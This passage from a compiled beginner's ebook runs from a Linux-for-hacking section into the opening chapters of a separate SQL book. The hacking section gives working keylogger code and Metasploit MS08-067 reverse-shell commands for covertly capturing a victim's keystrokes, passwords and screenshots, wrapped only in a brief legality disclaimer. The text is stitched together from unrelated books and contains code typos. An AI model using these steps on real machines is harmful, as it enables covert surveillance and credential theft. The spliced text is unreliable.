operating system is that it is seen as being less vulnerable than some of the
other options. Today, most of the operating systems that we are able to
choose from, besides the Linux option, are going to have a lot of
vulnerabilities to an attack from someone with malicious intent along the
way.
Linux, on the other hand, seems to have fewer of these vulnerabilities in
place from the beginning. This makes it a lot nicer to work with and will
ensure that we are going to be able to do the work that we want on it, without
having a hacker getting. Linux is seen as one of the most secure out of all the
operating systems that are available and this can be good news when you are
starting out as an ethical hacker.
The next benefit that we are going to see when it comes to working with the
Linux operating system over some of the other options, especially if you are a
hacker, is that it is going to provide us with a lot of support and works with
most of the programming languages that you would choose to work on when
coding. Linux is already set up in order to work with a lot of the most popular
programming languages. This means that many options like Perl, Ruby
Python, PHP< C++ and Java are going to work great here.
This is good news for the hacker because it allows them to pick out the option
that they like. If you already know a coding language or there is one in
particular that you would like to use for some of the hacking that you plan to
do, then it is likely that the Linux system is going to be able to handle this
and will make it easy to use that one as well.
If you want to spend some of your time working on hacking, then the Linux
system is a good option. And this includes the fact that many of the hacking
tools that we are working with are going to be written out in Linux. Popular
hacking tools like Nmap and Metasploit, along with a few other options, are
going to be ported for Windows. However, you will find that while they can
work with Windows, if you want, you will miss out on some of the
capabilities when you transfer them off of Linux.
It is often better to leave these hacking tools on Linux. This allows you to get
the full use of all of them and all of the good capabilities that you can find
with them, without having to worry about what does and does not work if you
try to move them over to a second operating system. These hacking tools
were made and designed to work well in Linux, so keeping them there and
not trying to force them into another operating system allows you to get the
most out of your hacking needs.
And finally, we are able to take a quick look at how the Linux operating
system is going to take privacy as seriously as possible. In the past few years,
there was a lot of information on the news about the privacy issues that
would show up with the Windows 10 operating system. Windows 10 is set up
to collect a lot of data on the people who use it the most. This could bring up
some concerns about how safe your personal information could be.
This is not a problem when we are working with Linux. This system is not
going to take information, you will not find any talking assistants to help you
out and this operating system is not going to be around, collecting
information and data on you to have some financial gain. This all can speak
volumes to an ethical hacker who wants to make sure that their information
stay safe and secure all of the time.
As you can see here, there are a lot of benefits that are going to show up
when it is time to work with the Linux system. We can find a lot of examples
of this operating system and all of the amazing things that it is able to do,
even if we don’t personally use it on our desktop or laptop. The good news is
that there are a lot of features that are likely to make this operating system
more effective and strong in the future, which is perfect when it comes to
doing a lot of tasks, including the hacking techniques that we talked about.
Making a key logger
The first thing we are going to learn how to work with is a key logger. This
can be an interesting tool because it allows you to see what keystrokes
someone is making on your computer right from the beginning. Whether you
have a network that you need to keep safe and you want to see what others
are the system are typing out, or if you are using a type of black hat hacking
and are trying to get the information for your own personal use, the key
logger is one of the tools that you can use to make this work out easily for
you.
Now there are going to be a few different parts that you will need to add in
here. You can download a key logger app online (git is one of the best ones to
use on Linux for beginners), and while this is going to help you to get all the
characters that someone is typing on a particular computer system, it is not
going to be very helpful. Basically here you are going to get each little letter
on a different line with no time stamps or anything else to help you out.
It is much better to work this out so that you are getting all the information
that you need, such as lines of text rather than each letter on a different line
and a time stamp to tell you when each one was performed. You can train the
system to only stop at certain times, such as when there is a break that is
longer than two seconds, and it will type in all the information that happens
with the keystrokes at once rather than splitting it up. A time stamp is going
to make it easier to see when things are happening and you will soon be able
to see patterns, as well as more legible words and phrases.
When you are ready to bring all of these pieces together, here is the code that
you should put into your command prompt on Linux in order to get the key
logger all set up:
import pyxhook
#change this to your log file’s path
log_file = ‘/home/aman/Desktop/file.log’
#this function is called every time a key is pressed
def OnKeyPress(event):
fob = open(log_file, ‘a’)
fob.write(event.Key)
fob.writer(‘\n’)
if event.ASCII==96: #96 is the asci value of the grave key
fob.close()
new_hook.cancel()
#instantiate HookManager class
new_hook=pyxhook.HookManager()
#listen to all keystrokes
new_hook.KeyDown=OnKeyPress
#hook the keyboard
new_hook.HookKeyboard()
#start the session
new_hook.start()
Now you should be able to get a lot of the information that you need in order
to keep track of all the key strokes that are going on with the target computer.
You will be able to see the words come out in a steady stream that is easier to
read, you will get some time stamps, and it shouldn’t be too hard to figure out
where the target is visiting and what information they are putting in. Of
course, this is often better when it is paired with a few other options, such as
taking screenshots and tracking where the mouse of the target computer is
going in case they click on links or don’t type in the address of the site they
are visiting, and we will explore that more now!
Getting screenshots
Now, you can get a lot of information from the key strokes, but often these
are just going to end up being random words with time stamps accompanying
them. Even if you are able to see the username and password that you want, if
the target is using a link in order to get their information or to navigate to a
website, how are you supposed to know where they are typing the
information you have recorded?
While there are a few codes that you can use in order to get more information
about what the target is doing, getting screenshots is one of the best ways to
do so. This helps you to not only get a hold of the username and passwords
based on the screenshots that are coming up, but you are also able to see what
the target is doing on the screen, making the hack much more effective for
you.
Don’t worry about this sounding too complicated. The code that you need to
make this happen is not too difficult and as long as you are used to the
command prompt, you will find that it is pretty easy to get the screenshots
that you want. The steps that you need to take in order to get the screenshots
include:
Step1: set the hack up
First, you will need to select the kind of exploit that you need to use. A good
exploit that you should consider using is the MS08_067_netapi exploit. You
will need to get this one onto the system by typing:
msf > use exploit/windows/smb/ms08_067_netapi
Once this is on the system, it is time to add in a process that is going to make
it easier to simplify the screen captures. The Metasploit’s Meterpreter
payload can make things easier to do. in order to get this to set up and load
into your exploit, you will need type in the following code:
msf> (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp
The following step is to set up the options that you want to use. A good place
to start is with the show options command. This command is going to let you
see the options that are available and necessary if you would like to run the
hack. To get the show options command to work well on your computer, you
will need to type in the following code:
msf > (ms08_067_netapi) show options
At this point, you should be able to see the victim, or the RHOST, and the
attacker or you, the LHOST, IP addresses. These are important to know when
you want to take over the system of another computer because their IP
address will let you get right there. The two codes that you will need in order
to show your IP address and the targets IP address so that you can take over
the targets system includes:
msf > (ms08_067_netapi) set RHOST 192.168.1.108
msf > (ms08_067_netapi) set LHOST 192.168.1.109
Now if you have gone through and done the process correctly, you should be
able to exploit into the other computer and put the Meterpreter onto it. The
target computer is going to be under your control now and you will be able to
take the screenshots that you want with the following steps.
Step 2: Getting the screenshots
With this step, we are going to work on getting the screenshots that you want.
But before we do that, we want to find out the process ID, or the PID, that
you are using. To do this, you will need to type in the code:
meterpreter > getpid
The screen that comes up next is going to show you the PID that you are
using on the targets computer. For this example we are going to have a PID
of 932, but it is going to vary based on what the targets computer is saying.
Now that you have this number, you will be able to check which process this
is by getting a list of all the processes with the corresponding PIDs. To do
this, you will just need to type in:
meterpreter > ps
When you look at the PID 932, or the one that corresponds to your targets
particular system, you will be able to see that it is going to correspond with
the process that is known as svrhost.exe. Since you are going to be using a
process that has active desktop permissions in this case, you will be ready to
go. If you don’t have the right permissions, you may need to do a bit of
migration in order to get the active desktop permissions. Now you will just
need to activate the built in script inside of Meterpreter. The script that you
need is going to be known as espia. To do this, you will simply need to type
out:
meterpreter > use espia
Running this script is just going to install the espia app onto the computer of
your target. Now you will be able to get the screenshots that you want. To get
a single screenshot of the target computer, you will simply need to type in the
code:
meterpreter > screengrab
When you go and type out this code, the espia script that you wrote out is
basically going to take a screenshot of what the targets computer is doing at
the moment, and then will save it to the root user’s directory. You will then
be able to see a copy of this come up on your computer. You will be able to
take a look at what is going on and if you did this in the proper way, the
target computer will not understand that you took the screenshots or that you
aren’t allowed to be there. You can keep track of what is going on and take as
many of the different screenshots that you would like.
These screenshots are pretty easy to set up and they are going to make it
easier than ever to get the information that you need as a hacker. You will not
only receive information about where the user is heading to, but also what
information they are typing into the computer.
Keep in mind that black hat hacking is usually illegal and it is not encouraged
in any way. While the black hat hackers would use the formulas above in
order to get information, it is best to stay away from using these tactics in an
illegal manner. Learning these skills however can be a great way to protect
yourself against potential threats of black hat hackers. Also, having hacking
skills allows you to detect security threats in the systems of other people.
Being a professional hacker can be a highly lucrative career, as big
companies pay a lot of money to ensure that their system is secure. Hack-
testing systems for them is a challenging, and fun way to make a living for
the skilled hackers out there!
Chapter 13 Types of Hackers
All lines of work in society today have different forms. You are either blue
collar, white collar, no collar…whatever. Hacking is no different. Just as
there is different kinds of jobs associated with different kinds of collar colors,
the same goes for hacking.
Hackers have been classified into many different categories, black hat, white
hat, grey hat, newbies, hacktivists, elites, and more. Now, to help you gain a
better understanding as to what grey hacking is, let’s first take a look at these
other kinds of hacking, so you can get a feel for what it is hackers do, or can
do, when they are online.
Newbies
The best place to start anything is at the beginning, which is why we are
starting with the newbie hackers.
The problem with a lot of newbie hackers is that they think they have it all
figured out when they really don’t. The idea of hacking is really only
scratching the surface when it comes to everything that is involved, and it is
not at all uncommon for people who want to get into it to get overwhelmed
when they see what really needs to be learned.
Don’t let that discourage you, however, you are able to learn it all, it just
takes time and effort on your part. Borrow books and get online. Look up
what needs to be and remember it. Don’t rush yourself. You need to learn,
and really learn. Anything that you don’t remember can end up costing you
later.
There are immediate reactions when it comes to the real world of hacking,
and sitting there trying to look up what you should have already known is not
going to get you far as a hacker. If you want to be good at what you do, then
take the time required to be good at it.
Don’t waste your time if you don’t think you really want to learn it, because
it is going to take a lot of your concentration to get to the heart of the matter.
Don’t get me wrong, it is more than worth it, but if you are only looking into
it for curiosity sake, don’t do it unless knowing really means that much to
you.
Sure there are those that kind of know what they are doing, or they can get
into their friend’s email account, but that is not the hacking I am talking
about here.
I want you to become a real life, capable hacker, and that isn’t going to
happen unless you are willing to take the time needed to learn it, and put
forth the effort to learn it.
You have to remember that any hacker that is in existence had to start as a
newbie hacker, and build up their skills from there. Now, as fast they built
those skills depended greatly on how much time and effort they put into
working on it, but don’t worry, you will get the hang of things, and while you
have to start as a newbie, you will have Grey Hat status soon enough.
Elites
As with the newbie hackers, elite hackers can be any kind of hacker, whether
that be good or bad. What makes them elite is the fact they are good at what
they do, and they know it.
There is a lot of respect for elite hackers online. Just like with elite anything,
they know what they are doing, and they know that others can’t challenge
them unless they too know how to handle themselves.
There is a level of arrogance that goes with the status, but it is well deserved.
Anyone can stop at second best, but it takes true dedication to reach the top.
An elite hacker can use their powers for good or bad, but they are a force to
be reckoned with either way. They know the way systems work, how to work
around them, and how to get them to do what they want them to do.
If you have a goal of becoming an elite hacker, you do have your work cut
out for you, but don’t worry, you will get there. It only takes time and effort
to get this top dog status, and it comes to those who want it.
No one ‘accidently’ achieves elite status, it is something that they had to
work for, but it is definitely worth all of the time and effort that is put into it.
As an elite hacker, you won’t have to worry about whatever system you run
into, you will know what is coming, and how you can work around it, it just
comes with the line of work.
Hacktivists
Hacktivist hackers use their skills to promote a social or political agenda.
Sometimes they are hired by specific groups to get into places online and
gather information, sometimes they work all on their own.
The point of this kind of hacking is to make one political party look bad, and
the one that the hacker promotes to look good.
Then, they either publish it elsewhere online, or they pass it along so others
can see what the person has done or what they are accused of doing. It is a
way for politicians to make jabs at each other, and it isn’t really playing the
game fairly.
The hacker then is either payed by the party that hired them, or, if they are
working for themselves, they get to see the results of what they posted about
the politician.
The list of hackers and what they do is one that goes on and on, but they all
can ultimately fit into three categories, being the black hat, white hat, and
grey hats. No matter what kind of hacker they are on top of it, these are the
three realms that are really all encompassing.
This is because these are not only hackers in and of themselves, but they are
also characteristics of every king of hacker out there. Whether they are doing
things for good, for bad, or doing good things without permission, these are
really what hacking comes down to.
Black hat
The black hat hacker is likely the most famous of the hacking world, or
rather, infamous. This is the line of hacking that movies tend to focus on, and
it is the line of hacking that has given all hacking a bad name.
A black hat hacker is a hacker that is getting into a system or network to
cause harm. They always have malicious intent, and they are there to hurt and
destroy. They do this by either stealing things, whether it be the person’s
information, the network’s codes, or anything else they find that is valuable
to them, or they can do it by planting worms and viruses into the system.
There have been viruses planted into various systems throughout history,
causing hundreds of thousands of dollars’ worth of damage, and putting
systems down for days.
Viruses are programs that hackers create, then distribute, that cause havoc on
whatever they can get a grip on. They often times disguise themselves to look
like one thing, and they prompt you to open them in whatever way they can.
Then, once you do open the link, they get into the hard drive of your system
and do whatever they want while they are in there. Many viruses behave like
they have a mind of their own, and you would be surprised at the harm they
can cause.
There is a certain kind of virus, known as a ‘backdoor’ virus, which allows its
sender to then have access to and control of whatever system it has planted
itself into. It is as though the person who owns the system is nothing more
than a bystander who can do nothing but watch as the virus takes its toll on
the system.
Hackers will use these viruses for a number of reasons, and none of them are
very good for you. When a hacker has access to your computer, they can then
do whatever they like on there.
They can get into your personal information, and use that for their own gain.
They can steal your identity, they can do things that are illegal while they are
on your computer, and thus make it look like you were the one who did it,
and get out of the suspicion by passing all the blame onto you.
These are really hard viruses to get rid of, and it is of utmost importance that
you do whatever you can to protect yourself on the outset to make sure you
don’t get one of these viruses. However, if you do happen to get one, there is
hope. You may have to get rid of a lot of your system, or close it down and
restart it entirely, but it is always better to do that then to let a hacker have
access to anything you are doing.
Black hat hackers are malicious. They only do what they do to harm others
and cause mischief. It is unfortunate that they do what they do, as this is what
made hacking fall under a bad light, but there is hope, because wherever there
is a bad thing, there is also some good to be found, and that good comes in
the form of the white and grey hat hackers.
b. White hat
The white hat hacker and the grey hat hacker are really similar, but there are
key differences that make them separate categories. The white hat hacker is a
person who is hired by a network or company to get into the system and
intentionally try to hack it.
The purpose of this is to test the system or network for weakness. Once they
are able to see where hackers can get in, they can fix it and make it more
difficult for the black hat hackers to break in.
They often do this through a form of testing known as Penetration Testing,
but we will look more on that later. White hat hackers always have
permission to be in the system they are in, and they are there for the sole
purpose of looking for vulnerabilities.
There is a high enough demand for this line of work that there are white hat
hackers that do it for a full time job. The more systems go up, and more
hackers are going to try to break into them. The more hackers that try to do
that, the more companies are going to need white hat hackers to keep them
out.
Companies aren’t too picky on who they hire to work for them, either, so it is
remarkable that so many hackers will choose to go down the black hat path.
They could be making decent wages by working for people and getting paid
for what they do, but unfortunately not many people see it this way, and they
would rather hack for their own selfish gain than to do what would help
others.
To put it simply, however, it can be broken down to a very basic relationship.
Black hackers try to get in, white hackers try to keep them out. Sometimes
the black hats have the upper hand, then there are times when it goes to the
whites.
It is like a codependent relationship of villain and super hero, where you are
rooting for one but the other still manages to get what they want every once
in a while.
It is a big circle that works out in the end. Of course it would be a lot easier if
black hat hackers would stop breaking into the systems in the first place, but
unfortunately that isn’t going to happen.
c. Grey hat
The world is often portrayed as being full of choices that are either right or
wrong. You can do it one way, or you can do it any way but that one right
way…thus making you wrong.
Right and wrong, black and white. Yet…what about those exceptions to the
rule? There is an exception to pretty much every rule in existence, and
hacking is no exception. Grey hat hackers fall into this realm.
Whether they are right to do what they do or wrong to do what they do is up
to the individual to decide, because it is a grey area.
To clarify what I mean, think about it this way. Black hat hackers get into
networks without permission to cause harm. That is bad. Very bad. White hat
hackers get into systems with permission to cause protection. That is good.
Very good.
But then you have the grey hat hackers. Grey hat hackers get into a system
without permission…which is bad, but they get into that system to help the
company or network…which is good.
So, in a nutshell, grey hat hackers use bad methods to do good things. Which,
in turn, should make the whole event a good thing. Many people feel that it is
the grey hat hackers that do the best job of keeping the black hat hackers at
bay, but there are still those that argue the grey hats should not do what they
do because they have no permission to do it.
What is important and universal is the fact that a grey hat hacker never does
anything malicious or bad to a system, in fact, they do every bit as good as
the white hat hackers for those who are in charge of the network, but they do
it for free.
In a way, the grey hat hackers can be considered the robin hoods of hacking,
doing what they can to help people, unasked, and unpaid, and largely without
a ‘thank you’ even.
Conclusion
So you’ve worked through my book. Congratulations! You have learnt all
you need to learn to become a perfect Linux command line ninja. You have
acquired powerful and really practical skills and knowledge. What remains is
a little experience. Undoubtedly, your bash scripting is reasonably good now
but you have to practice to perfect it.
This book was meant to introduce you to Linux and the Linux command line
right from scratch, teach you what you need to know to use it properly and a
bit more to take you to the next level. At this point, I can say that you are on
your way to doing something great with bash, so don’t hang your boots just
yet.
The next step is to download Linux (if you haven’t done so yet) and get
started with programming for it! The rest of the books in this series will be
dedicated to more detailed information about how to do Linux programming,
so for more high-quality information, make sure you check them out.
SQL COMPUTER PROGRAMMING
FOR BEGINNERS:
LEARN THE BASICS OF SQL
PROGRAMMING WITH THIS
STEP-BY-STEP GUIDE IN A
MOST EASILY AND
COMPREHENSIVE WAY FOR
BEGINNERS INCLUDING
PRACTICAL EXERCISE.

JOHN S. CODE

© Copyright 2019 - All rights reserved.


The content contained within this book may not be reproduced,
duplicated or transmitted without direct written permission from
the author or the publisher.
Under no circumstances will any blame or legal responsibility be
held against the publisher, or author, for any damages, reparation,
or monetary loss due to the information contained within this book.
Either directly or indirectly.
Legal Notice:
This book is copyright protected. This book is only for personal
use. You cannot amend, distribute, sell, use, quote or paraphrase
any part, or the content within this book, without the consent of the
author or publisher.
Disclaimer Notice:
Please note the information contained within this document is for
educational and entertainment purposes only. All effort has been
executed to present accurate, up to date, and reliable, complete
information. No warranties of any kind are declared or implied.
Readers acknowledge that the author is not engaging in the
rendering of legal, financial, medical or professional advice. The
content within this book has been derived from various sources.
Please consult a licensed professional before attempting any
techniques outlined in this book.
By reading this document, the reader agrees that under no circumstances is
the author responsible for any losses, direct or indirect, which are incurred as
a result of the use of information contained within this document, including,
but not limited to, — errors, omissions, or inaccuracies.
Table of Contents
Introduction
Chapter 1 Relational Database Concepts
Chapter 2 SQL Basics
Chapter 3 Some of the Basic Commands We Need to Know
Chapter 4 Installing and configuring MySql on your system
Chapter 5 Data Types
Chapter 6 SQL Constraints
Chapter 7 Databases
Chapter 8 Tables
Chapter 9 Defining Your Condition
Chapter 10 Views
Chapter 11 Triggers
Chapter 12 Combining and Joining Tables
Chapter 13 Stored Procedures and Functions
Chapter 14 Relationships
Chapter 15 Database Normalization
Chapter 16 Database Security and Administration
Chapter 17 Real-World Uses
Conclusion
Introduction
Anything that stores data records is called a database. It can be a file, CD,
hard disk, or any number of storage solutions. From a programming point of
view, a database is a methodically structured repository of indexed data
information that can be easily accessed by the users for creating, retrieving,
updating and deleting information. Data can be stored in many forms. Most
applications require a database for storing information.
A database can be of two types: (1) flat database and (2) relational database.
As, the name suggests a flat database has a two dimensional structure that has
data fields and records stored in one large table. It is not capable of storing
complex information, which creates a need for relational databases. A
relational database stores data in several tables that are related to each other.
Let’s take the example of a school. A school will have to maintain data for
several students. To find information for a student, we will first ask the class
name. After the class name, we will ask for the first name. However, if there
are two children with the same first name, then we will ask for the surname.
If there are two children will identical names, we can still discriminate the
information related to them based on their student id, parents name, date of
birth, siblings in same school, etc. This is all related information. When all
of this information is stored on paper, it takes a lot of time to retrieve it.
Relational database allow easy access to all of this information.
Let’s suppose Alex is not feeling well in school and the teacher wants to call
his parents to come and pick him up. In the traditional way of maintaining
information on paper, if the teacher loses the file with Alex’s mom’s number,
she would not be able to contact her. However, if this information is stored in
a database, she just needs to go to the administrator. The administrator will
search for Alex’s home records and within a matter of seconds, the teacher
will have the contact details. This will also free her from the burden of
maintaining separate records for each child, allowing her to focus more time
on other teaching related activities.
A Brief History of SQL
SQL is a programming language designed for Relational Database
Management Systems (RDBMSs or just DBMSs). It is not a general-purpose
programming language to be used to create stand-alone programs or web
applications. It cannot be used outside of the DBMS world.
The origins of SQL are intertwined with the history of the origins and
development of relational databases. It all started with an IBM researcher,
Edgar Frank “Ted” Codd, who in June of 1970, published an article entitled
“A Relational Model of Data for Large Shared Data Banks” in the journal
Communications of the Association for Computing Machinery. In this paper,
Codd outlined a mathematical theory of how data could be stored and
manipulated using a tabular structure. This article established the
foundational theories for relational databases and SQL.
Codd’s article ignited several research and development efforts and this
eventually led to commercial ventures.
The company Relational Software, Inc. was formed in 1977 by a group of
engineers in Menlo Park, California and in 1979 they shipped the first
commercially available DBMS product, named Oracle. The company
Relational would eventually be renamed Oracle.
In 1980, several Berkeley University professors resigned and founded
Relational Technology, Inc. and in 1981, they released their DBMS product
named Ingres.
In 1982, IBM finally started shipping its DBMS product, named SQL/Data
System or SQL/DS. In 1983, IBM released Database 2 or DB2 for its
mainframe systems.
By 1985, Oracle proclaimed that they had over 1,000 Oracle installations.
Ingres had a comparable number of sites and IBM’s DB2 and SQL/DS
products were approaching 1,000.
As these vendors were developing their DBMS products, they were also
working on their products’ query language – SQL.
IBM developed SQL at its San Jose Research Laboratory in the early 1970s
and formally presented it in 1974 at a conference of the Association of
Computing Machinery, ACM. The language was originally named
“SEQUEL” for Structured English Query Language but it was later shortened
to just SQL.
It was Oracle Corporation, however (then known as Relational Software
Inc.), who came out with the first implementation of SQL for its Oracle
DBMS. IBM came out with its own version in 1981 for its SQL/DS DBMS.
Because of the increasing popularity and proliferation of DBMSs and
consequently, SQL, the American National Standards Institute, ANSI, began
working on a SQL standard in 1982. This standard, released in 1986 as
X3.135, was largely based on IBM’s DB2 SQL. In 1987, the International
Standards Organization, ISO, adopted the ANSI standard also as an ISO
standard.
Since 1986, ANSI has continued to work on the SQL standard and released
major updates in 1989, 1992, and 1999.
The 1999 standard added extensions to SQL to allow the creation of
functions either in SQL itself or in another programming language. Since its
official appearance, the 1999 standard has been updated three times: in 2003,
in 2006, and in 2008. This last update is known as SQL:2008. There have
been no updates since then.
Current vendors exert admirable efforts to conform to the standard, but they
still continue to extend their versions of the SQL language with additional
features.
The largest vendor, with a market share of 48% as of 2011, is Oracle
Corporation. Its flagship DBMS, Oracle 11g, has dominated the UNIX
market since the birth of the DBMS market. Oracle 11g is a secure, robust,
scalable, high-performance database. However, Oracle 11g holds only second
place in the transaction processing benchmark.
Next, IBM’s DB2, holds the record in transaction speed. DB2’s current
version is 9.7 LUW (Linux, UNIX and Windows). IBM holds 25% of the
DBMS market.
Third is Microsoft with an 18% share. Their product is SQL Server and the
latest version is 2008 Release 2. Microsoft also has Microsoft Office Access,
which is touted as a desktop relational database. Unlike the other DBMSs
mentioned in this book, Access is a file-based database and as such has
inherent limitations in performance and scalability. It also only supports a
subset of the SQL Standard.
The remaining 12% market share is staked out by Teradata, Sybase and other
vendors including open source databases, one of which is MySQL.
MySQL was initially developed as a lightweight, fast database in 1994. The
developers, Michael Widenius and David Axmark, intended MySQL to be
the backend of data-driven websites. It was fast, had many features, and it
was free. This explains its rise in popularity. In 2008, MySQL was acquired
by Sun Microsystems, and Sun Microsystems was later purchased by Oracle.
Oracle then offered a commercial version of MySQL in addition to the free
version. The free version was named “community edition.”
In programming, a relatively small addition or extension to a language that
does not change the intrinsic nature of that language is called a dialect. There
are five dominant SQL dialects:
PL/SQL, which means Procedural Language/Structured Query Language. It
is Oracle’s procedural extension for SQL and the Oracle DBMS.
SQL/PL is IBM DB2’s procedural extension for SQL.
Transact-SQL was initially developed jointly by Microsoft and Sybase
Adaptive Server in the early 1990s, but since then the two companies have
diverged and this has resulted in two distinct versions of Transact-SQL.
PL/pgSQL means Procedural Language/postgreSQL, which is the name of
the SQL extensions implemented in PostgreSQL.
MySQL has introduced a procedural language into its database in version 5
but there is no official name for it. Now that Oracle owns MySQL, it is
possible that Oracle might introduce PL/SQL as part of MySQL.
The above SQL dialects implement the ANSI/ISO standard. Programmers
should have few problems migrating from one dialect to another.
It is also interesting to note the computer technology landscape during the
period that relational databases and SQL began to emerge—the late 1970s to
early 1980s. During that period, IBM dominated the computer industry with
its mainframe computers, but was facing strong competition from
minicomputer vendors Digital Equipment, Data General, and Hewlett-
Packard, among others. Cobol, C, and Pascal were the predominant
languages. Java was non-existent, and object-oriented programming had just
emerged. Almost all software was proprietary with license fees in the tens or
hundreds of thousands. The internet was just a couple of laboratories
interconnected to share research papers. The World Wide Web was just a
fantasy.
Today, most of the dominant software and hardware of that era have gone the
way of the dinosaur and much more powerful and innovative technologies
have replaced them.
The only exception to this is the DBMS and its Structured Query Language,
SQL, which continues to grow and dominate the computer world with no sign
of becoming overshadowed or obsolete.
Chapter 1 Relational Database Concepts
What is Data?
Data can be defined as facts and statistics which are related to any object
under consideration. For example, your name, height, weight age, etc. these
are some specific data related to you. Also, an image, or a document or even
a picture can also be considered data.

What is a Database?
Database can be said to be a place reserved to store and also process
structured information. Database can also be said to be a systematic
compilation/ collection of data. It is not a rigid platform, information stored
in a Database can also be manipulated, modified or adjusted when the need
arises. Database also supports the retrieval of stored information or data for
further use. Database has many forms that store and organize information
with the use of different structures. In a nutshell, data management becomes
easy with databases.
For instance,
An online telephone directory would certainly use database for storage of
data pertaining to phone numbers, people, as well as other contact details.
Also, an electricity service provider will need a database to manage billing
and other client related concerns. Database also helps to handle some
discrepancies in data among other issues.
Furthermore, the global and far-flung social media platform known as
Facebook. Which has a lot of members and users connected across the world.
Database is needed to store all the information of users, manipulate and also
present data related to users of this platform and their online friends. Also,
database helps to handle various of activities of users’ birthday, anniversary
among others, as well as advertisements, messages, and lots more.
In addition, most businesses depend absolutely on database for their daily
operation. For complex multinationals database is needed to take inventory,
prepare payroll for staff, process orders from clients, transportation, logistics,
and shipping which often requires tracking of goods. All these operations are
made easy because of a well-structured data base.
It can go on and on providing innumerable examples of database usage.
What is a Database Management System (DBMS)?
But how can you access the data in your database? This is the function of
Database Management System (DBMS). DBMS can then be said to be a
collection of programs which enables its users to gain access to the
information on the database, manipulate data, as well as reporting or
representation of data. Database Management System also helps to control
and restrict access to the database.
Database Management Systems was first implemented in 1960s and it cannot
be said to be a new concept. From history, Charles Bachmen's Integrated
Data Store (IDS) is the first ever Database Management Systems. After some
time, technologies evolved speedily and before long wide usage and diverse
functionalities of databases have been increased immeasurably.

Types of DBMS
There are four different types of DBMS which are;

Hierarchical
Network DBMS
Object-Oriented DBMS
Relational DBMS
Hierarchical- which is rarely used nowadays and usually supports the
"parent-child" relationship of storing data.
Network DBMS - this type of DBMS employs many-to-many relationships.
And this usually results in very complex database structures. An example of
this DBMS is the RDM (Raima Database Manager) Server.
Object-Oriented DBMS - new data types employ this DBMS. The data to be
stored are always in form of objects. An example of this DBMS is the
TORNADO.
Relational DBMS (RDBMS) - This is a type of Database Management
System that defines database relationships in form of tables, which is also
known as relations. For instance, in a logistics company with a database that
is designed for the purpose of recording fleet information, for effectiveness,
you can include a table that has list of employees and another table which
contains vehicles used by the employee. The two are held separately since
their information is different.
Unlike other Database Management Systems such as Network DBMS, the
RDBMS does not support many-to-many relationships. Relational Database
Management System do not support all data types, they usually have already
pre-defined data types which they can support. The Relational Database
Management System is still the most popular DBMS type in the market
today. Common examples of relational database management systems
include Oracle, MySQL, as well as Microsoft SQL Server database.

The Relational Model


This model proposes that;

1. Data is organized and then stored in tables.


2. Databases are responsible for holding a collection of data
stored in tables.

Elements of a Relational Database Schema


Some of these key elements include:

Tables
Indexes
Keys
Constraints
Views
Popular Relational Database Management Systems
There are some popular relational database management systems, and they
will be discussed in this chapter.

1. MySQL
This is the most popular open source SQL database which is usually used for
development of web application. The main benefit of this is that it is reliable,
inexpensive and also easy to use. It is therefore widely used by a broad
community of developers over the years. The MySQL has been in used since
1995.
One of the disadvantages, however, is that it does not contain some recent
features that most advanced developers would like to use for better
performance. The outcome is also poor when scaling and the open source
development has also lagged since MySQL has been taken over by Oracle.

2. PostgreSQL
This is one of the open source SQL databases which is independent of any
corporation. It is also used basically for development of web application.
Some of the advantages of PostgreSQL over MySQL is that it is also easy to
use, cheap and used by a wide community of developer. In addition, foreign
key support is one of the special features of the PostgreSQL. And it does not
require complex configuration.
On the other hand, it is led popular that the MySQL and this makes it hard to
access, it is also slower than the MySQL.

3. Oracle DB
The code for Oracle Database is not open sourced. It is owned by Oracle
Corporation. It is a Database employed by most multinational around the
world especially top financial institutions such as banks. This is because it
offers a powerful combination of comprehensive, technology, and pre-
integrated business applications. It also has some unique functions built in
specifically for banks.
Although it is not free to use by anyone, it can be very expensive to acquire.

4. SQL Server
This is owned by Microsoft and it is not open sourced. It is mostly used by
large enterprise and multinationals. Well, there is a free version for trial
where you can test the features but for bogger features. Then, it becomes
expensive to use. This test version is called Express.

5. SQLite
This is a very popular open source SQL database. It has the ability to store an
entire database just in one file. It has a major advantage of SQLite which is
its ability to save or store data locally without necessarily using a server.
It is a popular choice for companies that use cellphones, MP3 players, PDAs,
set-top boxes, and other electronic gadgets.
Chapter 2 SQL Basics
The SQL (the Structured Query Language, Structured Query Language)
is a special language used to define data, provide access to data and their
processing. The SQL language refers to nonprocedural languages - it only
describes the necessary components (for example, tables) and the desired
results, without specifying how these results should be
obtained. Each SQL implementation is an add-on on the database engine,
which interprets SQL statements and determines the order of accessing the
database structures for the correct and effective formation of the desired
result.
SQL to Work with Databases?
To process the request, the database server translates SQL commands into
internal procedures. Due to the fact that SQL hides the details of data
processing, it is easy to use.
You can use SQL to help out in the following ways:

SQL helps when you want to create tables based on the data
you have.
SQL can store the data that you collect.
SQL can look at your database and retrieves the information on
there.
SQL allows you to modify data.
SQL can take some of the structures in your database and
change them up.
SQL allows you to combine data.
SQL allows you to perform calculations.
SQL allows data protection.
Traditionally, many companies would choose to work with the ‘Database
Management System,’ or the DBMS to help them to keep organized and to
keep track of their customers and their products. This was the first option that
was on the market for this kind of organization, and it does work well. But
over the years there have been some newer methods that have changed the
way that companies can sort and hold their information. Even when it comes
to the most basic management system for data that you can choose, you will
see that there is a ton more power and security than you would have found in
the past.
Big companies will be responsible for holding onto a lot of data, and some of
this data will include personal information about their customers like address,
names, and credit card information. Because of the more complex sort of
information that these businesses need to store, a new ‘Relational Database
Management System’ has been created to help keep this information safe in a
way that the DBMS has not been able to.
Now, as a business owner, there are some different options that you can pick
from when you want to get a good database management system. Most
business owners like to go with SQL because it is one of the best options out
there. The SQL language is easy to use, was designed to work well with
businesses, and it will give you all the tools that you need to make sure that
your information is safe. Let’s take some more time to look at this SQL and
learn how to make it work for your business.
How this works with your database
If you decide that SQL is the language that you will work on for managing
your database, you can take a look at the database. You will notice that when
you look at this, you are basically just looking at groups of information.
Some people will consider these to be organizational mechanisms that will be
used to store information that you, as the user, can look at later on, and it can
do this as effectively as possible. There are a ton of things that SQL can help
you with when it comes to managing your database, and you will see some
great results.
There are times when you are working on a project with your company, and
you may be working with some kind of database that is very similar to SQL,
and you may not even realize that you are doing this. For example, one
database that you commonly use is the phone book. This will contain a ton of
information about people in your area including their name, what business
they are in, their address, and their phone numbers. And all this information
is found in one place so you won't have to search all over to find it.
This is kind of how the SQL database works as well. It will do this by
looking through the information that you have available through your
company database. It will sort through that information so that you are better
